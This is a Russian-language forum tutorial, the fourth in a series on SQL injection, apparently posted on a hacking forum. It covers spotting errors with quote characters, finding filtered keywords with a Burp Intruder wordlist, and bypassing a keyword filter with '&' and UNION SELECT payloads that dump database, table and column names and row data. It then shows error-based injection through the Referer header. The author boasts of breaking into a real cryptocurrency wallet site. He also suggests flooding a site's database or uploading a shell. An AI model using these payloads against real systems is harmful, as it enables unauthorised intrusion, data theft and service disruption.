SQL INJECTION от новичка до профессионала (Урок четвертый) уязвимости в POST заголовках

pentest · 11 мар 2023

Приветствую на моем четвертом уроке по SQL INJ уязвимостям , кто-то мне скажет: "Чувак , иди ты со своими скулями , это неактуально".На что я вам отвечу идите на
Чтобы не быть голословным , я серфил не говно сайты , а криптовалютные коши и мне удалось один поломать.А вы не верили? @Stasi поэтому выкуси анимечник.Если стараться , то благодаря скулям можно хоть горы свернуть.Ленивые люди всегда будут искать отмазы вместо того , чтобы действовать.

https://zelenka.guru/threads/5067498/

Для начала давайте повторим пройденный материал , ведь закрепление должно быть какое-то. @RaysMorgan попросил оформлять статьи более аккуратно , поэтому я буду стараться , всё делать аккуратно , чтобы вам было понятно.Чему я вас учил?Правильно!Нужно в самом начале ПОПЫТАТЬСЯ вывести ошибку SQL на экран.Как мы это можем сделать?Одинарной кавычкой , одинарной кавычкой со скобкой или двойной кавычкой , двойной со скобкой.Бывает такое , что обрамление не нужно
Представим , что у нас есть вот такая форма для обратной связи

Пробуем перебрать все варианты
'
')
"
")

SQL
'

')

"

")
У меня от одинарной кавычки появился вывод ошибки , а значит обрамление ' или ').В дальнейшем узнаем
Давайте думать как админ.У нас есть сайт , а значит мы хотим контролировать , что вводит юзер.Можно сделать по регулярке , чтобы заменялись какие-либо SQL слова на пустоту или на любой другой мусор , чтобы запросы не срабатывали.Давайте пробовать проверять
есть операторы or и and.Давайте сделаем так 'and и 'or

and удалился...

or тоже удалился
Теперь вот так попробуем
') and

Как мы видим ) входит в часть запроса , а значит обрамление без скобки , просто одинарная кавычка.
Такс..Закидываем снюс и выдыхаем.Нужно попробовать получить название бдшки с помощью union.Давайте , чтобы не мучаться и не думать какие слова фильтруются сделаем свой словарик и дядь бурпом пройдемся.
'select
'union
'and
'or
'column
'table
'name
'information_schema
'
'from
'database()
'user()
'order by
'group by
'sleep
'like
'false
'true
'where
'LIMIT

SQL
'select

'union

'and

'or

'column

'table

'name

'information_schema

'

'from

'database()

'user()

'order by

'group by

'sleep

'like

'false

'true

'where

'LIMIT
Теперь берем дядь бурпыч , включаем перехватчик , вводим любые данные в поле уязвимое и отправляем в intruder.Сейчас покажу для примера:

И отправляем данные.Приходит запрос и отправляем в intruder

Выделяем данные , которые мы вводили и жмем ADD $

сюда наш словарик вводим.(Paste)

Если размер одинаковый , то слово фильтруется, т.к пустота , то размер одинаковый)
Я узнал , что фильтруется sleep,and,or, ||.Можно крутить через слепую заменив sleep НА benchmark , НО ЭТО ДОЛГО. & - не входит в список запрещенных слов.Составляем парочку запросов и проверяем , который отдаст название бд)
'& 1=2 UNION SELECT database() -- -
'& 1=1 UNION SELECT database() -- -
'& false UNION SELECT database() -- -
1,3 ЗАПРОС отдали мне название бд

Теперь можно получить название таблиц:
'& 1=2 UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database() limit 0,1 -- -
'& 1=2 UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database() limit 1,1 -- -
Как мы помним INFORMATION_SCHEMA хранит в себе названия таблиц , колонок , вот поэтому мы к ней обращаемся.А limit отвечает за номер таблицы в данном случае 0,1 - ПЕРВАЯ , 1,1 - вторая и т.д
Увеличиваем limit ДО ТЕХ ПОР , пока не перестанут показываться таблицы

Получаем название колонок для нужной таблицы
'& 1=2 UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="lansk0y" limit 0,1 -- -
Заметьте , что название таблицы указывается в скобках , желательно в других , которые отличаются от обрамления.Просто привыкните так , в дальнейшем будет легче из-за этой привычки.
Забираем содержимое
'& 1=2 UNION SELECT id FROM lansk0y LIMIT 0,1 -- -

Флаг получен))
Нажмите, чтобы раскрыть...
Отлично , мы повторили некоторый пройденный материал.А дальше уже пойдет новая тема , но стоит помнить . что любая тяжелая работа окупается , как сказал мой бро RaysMorgan
А теперь погнали к уязвимостям в POST заголовках

Для начала нужно знать из чего состоит POST запрос - это довольно легко понять , открываем дядю бурпа ищем форму на сайте вводим данные и перехватываем.Теперь нужно понять , где могут быть SQL уязвимости.Ответ везде , где данные хранятся в СУБД.
User-agent - это браузер с которого мы зашли
Cookie - ЭТО некая информация которая хранит наши данные , чтобы нас идентифицировать
И также скули могут быть в полях куда мы вводи какую-либо информацию (login/passwd/обратная связь и т.д)
Также есть параметр , который отслеживает с какого сайта мы пришли и он часто бывает уязвимым.Его нет , когда мы перехватываем запрос , поэтому мы можем сами написать его и значение , чтобы проверить. Referer: '
И кстати , если параметр Referer уязвим , то это означает , что значения , которые мы передаем записывают в бд.Админу же надо знать откуда пришел юзер , чтобы например понимать , где реклама более успешная и т.д
Для нас это на руку , мы можем просто положить сайт захломив бд , отправив тысячи запросов в Referer С помощью intruder , залить шелл и т.д
Еще SQL встречается в X-Forwarded-For - это параметр для определения ip клиента.

Ладно , это хорошо.Теперь давайте на практике будем ломать сайтик
Перехватываем запрос

Пробуем подставить ' в user-agent,cookie,get параметр , но никакой ошибки не выводится.Значит пробуем подставлять в "невидимые" параметры такие , как "Refer".

Nice!Теперь мы можем раскручивать , но сначала подберем обрамление)
Referer: 'or extractvalue(1,concat(0x7e,user())) AND '
У меня при таком обрамление вывелся текущий юзер...

Дальше просто отправляем запросы в зависимости от вашей СУБД и техники , скорее всего это будет blind/time И раскручиваем.Если вам понравилась статья , то пишите об этом в комментариях.Удачи